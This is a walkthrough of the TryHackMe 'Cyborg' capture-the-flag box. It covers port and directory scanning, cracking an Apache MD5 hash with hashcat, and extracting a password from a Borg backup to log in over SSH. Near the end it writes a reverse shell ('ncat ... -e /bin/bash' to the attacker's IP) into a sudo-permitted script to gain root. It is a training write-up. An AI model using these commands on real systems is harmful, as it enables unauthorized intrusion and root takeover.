12 minutes
THM: Cyborg
Title:Cyborg
Description:A box involving encrypted archives, source code analysis and more.
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.66.0 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 20:40 GMT
Nmap scan report for 10.10.66.0
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds
Website
Only SSH and a website, so we head to the website first. It is just the apache default page so lets run a directory scan
# gobuster dir -u http://10.10.66.0 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.66.0
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/admin (Status: 301) [Size: 308] [--> http://10.10.66.0/admin/]
/etc (Status: 301) [Size: 306] [--> http://10.10.66.0/etc/]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 275]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Starting with the /admin directory we find a basic website
Looking around the site there is a admin shoutbox that gives us some clues and archive.tar file we can download from the archive menu
Looking at the /etc directory we see that it is an open listing and contains a squid config and auth file. This links to what was mentioned in the admin shoutbox
Website files
So we now have a few files to work through. We will start with the passwd file. First we check the hash type which identifies it as MD5(APR) and then feed it to hashcat
# nth -t '$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.'
_ _ _____ _ _ _ _ _
| \ | | |_ _| | | | | | | | | |
| \| | __ _ _ __ ___ ___ ______| | | |__ __ _| |_ ______| |_| | __ _ ___| |__
| . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______| _ |/ _` / __| '_ \
| |\ | (_| | | | | | | __/ | | | | | | (_| | |_ | | | | (_| \__ \ | | |
\_| \_/\__,_|_| |_| |_|\___| \_/ |_| |_|\__,_|\__| \_| |_/\__,_|___/_| |_|
https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Most Likely
MD5(APR), HC: 1600
Apache MD5, HC: 1600
md5apr1, HC: 1600
# hashcat -m 1600 -a 0 '$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz, 1435/2934 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:s*******d
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Wed Mar 19 23:04:35 2025 (3 secs)
Time.Estimated...: Wed Mar 19 23:04:38 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 19650 H/s (5.70ms) @ Accel:32 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 39040/14344385 (0.27%)
Rejected.........: 0/39040 (0.00%)
Restore.Point....: 38912/14344385 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: treetree -> pinche
Hardware.Mon.#1..: Util: 77%
Started: Wed Mar 19 23:04:34 2025
Stopped: Wed Mar 19 23:04:39 2025
Nothing much we can do with password now since it doesnt work anywhere, so moving onto the archive.tar file. After extracting it there is a README which indicates it was made using borg backup. After checking the documenation we can use a the list command with borg to show what archives there are. It turns out it is protected by a password, and our earlier discovered one works
# borg list home/field/dev/final_archive/
Enter passphrase for key /root/thm/cyborg/home/field/dev/final_archive:
music_archive Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
Now knowing the archive name we can get a list of files in it
# borg list home/field/dev/final_archive/::music_archive
Enter passphrase for key /root/thm/cyborg/home/field/dev/final_archive:
drwxr-xr-x alex alex 0 Tue, 2020-12-29 13:55:52 home/alex
-rw-r--r-- alex alex 3637 Mon, 2020-12-28 14:25:14 home/alex/.bashrc
-rw-r--r-- alex alex 220 Mon, 2020-12-28 14:25:14 home/alex/.bash_logout
-rw-r--r-- alex alex 675 Mon, 2020-12-28 14:25:14 home/alex/.profile
drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:00:24 home/alex/Music
-rw------- alex alex 439 Mon, 2020-12-28 17:26:45 home/alex/.bash_history
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.dbus
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.dbus/session-bus
-rw-r--r-- root root 464 Mon, 2020-12-28 16:33:47 home/alex/.dbus/session-bus/c707f46991feb1ed17e415e15fe9cdae-0
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript
-rw-r--r-- root root 7046 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript/ActionScript.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript
-rw-r--r-- root root 8934 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript/AppleScript.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP
-rw-r--r-- root root 7254 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP/ASP.sublime-syntax.cache
-rw-r--r-- root root 640 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP/HTML-ASP.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Batch File
-rw-r--r-- root root 4850 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Batch File/Batch File.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#
-rw-r--r-- root root 604 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#/Build.sublime-syntax.cache
-rw-r--r-- root root 17237 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#/C#.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++
-rw-r--r-- root root 11817 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++/C.sublime-syntax.cache
-rw-r--r-- root root 15283 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++/C++.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Clojure
-rw-r--r-- root root 2814 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Clojure/Clojure.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/CSS
-rw-r--r-- root root 17947 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/CSS/CSS.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D
-rw-r--r-- root root 18692 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D/D.sublime-syntax.cache
-rw-r--r-- root root 287 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D/DMD Output.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Diff
-rw-r--r-- root root 806 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Diff/Diff.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang
-rw-r--r-- root root 5881 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/Erlang.sublime-syntax.cache
-rw-r--r-- root root 257 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/HTML (Erlang).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats
-rw-r--r-- root root 1607 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Attributes.sublime-syntax.cache
-rw-r--r-- root root 3096 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Commit.sublime-syntax.cache
-rw-r--r-- root root 1314 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Common.sublime-syntax.cache
-rw-r--r-- root root 1911 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Config.sublime-syntax.cache
-rw-r--r-- root root 328 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Ignore.sublime-syntax.cache
-rw-r--r-- root root 742 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Link.sublime-syntax.cache
-rw-r--r-- root root 473 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Log.sublime-syntax.cache
-rw-r--r-- root root 1342 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Rebase.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Go
-rw-r--r-- root root 7366 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Go/Go.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz
-rw-r--r-- root root 1506 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz/DOT.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Groovy
-rw-r--r-- root root 5574 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Groovy/Groovy.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell
-rw-r--r-- root root 2859 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Haskell.sublime-syntax.cache
-rw-r--r-- root root 588 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Literate Haskell.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/HTML
-rw-r--r-- root root 5979 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/HTML/HTML.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java
-rw-r--r-- root root 9275 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java.sublime-syntax.cache
-rw-r--r-- root root 909 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java Server Pages (JSP).sublime-syntax.cache
-rw-r--r-- root root 1661 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaDoc.sublime-syntax.cache
-rw-r--r-- root root 575 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaProperties.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript
-rw-r--r-- root root 16252 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JavaScript.sublime-syntax.cache
-rw-r--r-- root root 1561 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JSON.sublime-syntax.cache
-rw-r--r-- root root 1294 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/Regular Expressions (JavaScript).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX
-rw-r--r-- root root 1079 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/Bibtex.sublime-syntax.cache
-rw-r--r-- root root 10203 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX.sublime-syntax.cache
-rw-r--r-- root root 668 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX Log.sublime-syntax.cache
-rw-r--r-- root root 1788 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/TeX.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lisp
-rw-r--r-- root root 5115 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lisp/Lisp.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lua
-rw-r--r-- root root 5353 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lua/Lua.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile
-rw-r--r-- root root 234 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Make Output.sublime-syntax.cache
-rw-r--r-- root root 4762 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Makefile.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown
-rw-r--r-- root root 11172 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/Markdown.sublime-syntax.cache
-rw-r--r-- root root 393 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/MultiMarkdown.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Matlab
-rw-r--r-- root root 26157 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Matlab/Matlab.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C
-rw-r--r-- root root 25087 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C.sublime-syntax.cache
-rw-r--r-- root root 15819 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C++.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml
-rw-r--r-- root root 430 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/camlp4.sublime-syntax.cache
-rw-r--r-- root root 6237 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCaml.sublime-syntax.cache
-rw-r--r-- root root 1659 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamllex.sublime-syntax.cache
-rw-r--r-- root root 1623 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamlyacc.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Pascal
-rw-r--r-- root root 1171 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Pascal/Pascal.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Perl
-rw-r--r-- root root 8858 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Perl/Perl.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP
-rw-r--r-- root root 447 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/PHP/PHP.sublime-syntax.cache
-rw-r--r-- root root 32165 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP/PHP Source.sublime-syntax.cache
-rw-r--r-- root root 1248 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP/Regular Expressions (PHP).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python
-rw-r--r-- root root 17292 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python/Python.sublime-syntax.cache
-rw-r--r-- root root 1130 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python/Regular Expressions (Python).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R
-rw-r--r-- root root 14814 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/R.sublime-syntax.cache
-rw-r--r-- root root 219 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/R Console.sublime-syntax.cache
-rw-r--r-- root root 1177 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/Rd (R Documentation).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails
-rw-r--r-- root root 427 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/HTML (Rails).sublime-syntax.cache
-rw-r--r-- root root 388 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/JavaScript (Rails).sublime-syntax.cache
-rw-r--r-- root root 985 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby Haml.sublime-syntax.cache
-rw-r--r-- root root 1486 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby on Rails.sublime-syntax.cache
-rw-r--r-- root root 304 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/SQL (Rails).sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions
-rw-r--r-- root root 2985 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions/RegExp.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText
-rw-r--r-- root root 1611 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText/reStructuredText.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Ruby
-rw-r--r-- root root 9901 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Ruby/Ruby.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust
-rw-r--r-- root root 228 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Cargo.sublime-syntax.cache
-rw-r--r-- root root 8561 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Rust.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Scala
-rw-r--r-- root root 13481 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Scala/Scala.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript
-rw-r--r-- root root 10255 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Bash.sublime-syntax.cache
-rw-r--r-- root root 7668 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/commands-builtin-shell-bash.sublime-syntax.cache
-rw-r--r-- root root 158 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Shell-Unix-Generic.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/SQL
-rw-r--r-- root root 2724 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/SQL/SQL.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL
-rw-r--r-- root root 1010 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL/HTML (Tcl).sublime-syntax.cache
-rw-r--r-- root root 4120 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL/Tcl.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text
-rw-r--r-- root root 92 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.cache
-rw-r--r-- root root 43 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.rcache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Textile
-rw-r--r-- root root 1783 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Textile/Textile.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/XML
-rw-r--r-- root root 2344 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/XML/XML.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/YAML
-rw-r--r-- root root 3850 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/YAML/YAML.sublime-syntax.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default
-rw-r--r-- root root 4086 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Syntax Summary.cache
-rw-r--r-- root root 10895 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Meta Info Summary.cache
-rw-r--r-- root root 1003914 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Startup.cache
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Packages
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Packages/User
drwx------ root root 0 Mon, 2020-12-28 16:38:24 home/alex/.config/sublime-text-3/Local
-rw-r--r-- root root 5199 Mon, 2020-12-28 16:38:24 home/alex/.config/sublime-text-3/Local/Auto Save Session.sublime_session
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Lib
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Lib/python3.3
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Installed Packages
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/ibus
drwx------ root root 0 Mon, 2020-12-28 16:33:49 home/alex/.config/ibus/bus
drwxrwxr-x alex alex 0 Tue, 2020-12-29 13:55:52 home/alex/Documents
-rw-r--r-- root root 110 Tue, 2020-12-29 13:55:41 home/alex/Documents/note.txt
drwxrwxr-x alex alex 0 Mon, 2020-12-28 17:59:30 home/alex/Public
drwxrwxr-x alex alex 0 Mon, 2020-12-28 17:59:37 home/alex/Videos
drwxrwxr-x alex alex 0 Tue, 2020-12-29 13:57:14 home/alex/Desktop
-rw-r--r-- root root 71 Tue, 2020-12-29 13:57:14 home/alex/Desktop/secret.txt
drwxrwxr-x alex alex 0 Mon, 2020-12-28 17:59:57 home/alex/Downloads
drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:00:02 home/alex/Templates
drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:26:44 home/alex/Pictures
The ones that initially look interesting are note.txt and secret.txt so lets extract those
# borg extract home/field/dev/final_archive/::music_archive home/alex/Desktop/secret.txt
Enter passphrase for key /root/thm/cyborg/home/field/dev/final_archive:
# cat home/alex/Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"
# borg extract home/field/dev/final_archive/::music_archive home/alex/Documents/note.txt
Enter passphrase for key /root/thm/cyborg/home/field/dev/final_archive:
# cat home/alex/Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S********3
With that username and password we can login via SSH and get the user flag
# ssh alex@10.10.66.0
The authenticity of host '10.10.66.0 (10.10.66.0)' can't be established.
ED25519 key fingerprint is SHA256:hJwt8CvQHRU+h3WUZda+Xuvsp1/od2FFuBvZJJvdSHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.66.0' (ED25519) to the list of known hosts.
alex@10.10.66.0's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
27 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
alex@ubuntu:~$ ls
Desktop Documents Downloads Music Pictures Public Templates user.txt Videos
alex@ubuntu:~$ cat user.txt
flag{1*******************************3}
Privilege escalation
Checking our sudo permissions we see there is a entry to run a script
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
Initially we dont have permissions to edit the script, but since we own it that is easy to change. We just replace it with a reverse shell command and we get root access
alex@ubuntu:~$ ls -l /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 2020 /etc/mp3backups/backup.sh
alex@ubuntu:¬$ chmod 755 /etc/mp3backups/backup.sh
alex@ubuntu:~$ echo 'ncat 10.11.18.78 6666 -e /bin/bash' > /etc/mp3backups/backup.sh
alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.66.0] 41332
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
flag{T*********************************d}